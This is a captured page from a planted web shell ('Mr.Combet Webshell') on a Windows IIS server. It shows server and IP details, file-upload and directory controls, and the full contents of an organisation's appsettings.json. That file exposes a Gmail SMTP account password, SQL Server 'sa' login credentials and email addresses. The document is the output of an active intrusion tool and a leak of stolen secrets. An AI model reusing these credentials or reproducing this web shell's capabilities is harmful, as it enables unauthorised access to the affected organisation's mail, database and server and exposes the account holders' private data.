Mr.Combet Webshell
Your IP :
216.73.216.136
Server IP :
103.233.58.157
Server :
Windows NT WIN-4PGF72KEHKB 10.0 build 17763 (Windows Server 2016) AMD64
Server Software :
Microsoft-IIS/10.0
PHP Version :
7.3.25
Add File :
Submit
Add Directory :
Submit
Dir :
C:
/
inetpub
/
wwwroot
/
OrthoAssociation
/
publish
/
View File Name :
appsettings.json
{ "AppSettings": { "AwsSesEnabled": false, "FileRootFolderName": "Uploads/", "FileBasePath": "" }, "AWS": { "Profile": "profile", //"ProfilesLocation": "~/.aws/credentials", "ProfilesLocation": "", "Region": "ap-south-1", "FromEmail": "bhospit.irc@gmail.com" }, "EmailSettings": { "FromEmail": "teamnextnepal@gmail.com", "HostName": "smtp.gmail.com", "UserName": "teamnextnepal@gmail.com", "Password": "rqlrrzrriivsozdr", "Port": 587, "EnableSsl": true }, "Logging": { "LogLevel": { "Default": "Information", "Microsoft": "Warning", "Microsoft.Hosting.Lifetime": "Information" } }, "AllowedHosts": "*", "ConnectionStrings": { //"DbConnectionString": "Server=Sim;Database=IRC;user=sa;password=sa123##;MultipleActiveResultSets=true;connect timeout=500;" "DbConnectionString": "Server=(local);Database=noaj;user=sa;password=sa123##;MultipleActiveResultSets=true;connect timeout=500;" }, //Identity policy "IdentityOptions": { // User settings "User": { "RequireUniqueEmail": false }, // Password settings "Password": { "RequiredLength": 6, "RequireLowercase": false, "RequireUppercase": false, "RequireDigit": false, "RequireNonAlphanumeric": false }, // Lockout settings "Lockout": { "AllowedForNewUsers": true, "DefaultLockoutTimeSpanInMins": 30, "MaxFailedAccessAttempts": 10 }, "Custom": { "PreventMultipleLoginForSameUser": true, "UserIdleTimeoutMinutes": 110 //this value must be less than ApiToken->RefreshExpireMinutes }, "ApiToken": { "SecretKey": "THIS IS USED TO SIGN AND VERIFY JWT TOKENS, REPLACE IT WITH YOUR OWN SECRET, IT CAN BE ANY STRING", "AccessExpireMinutes": 60, "RefreshExpireMinutes": 120 } } }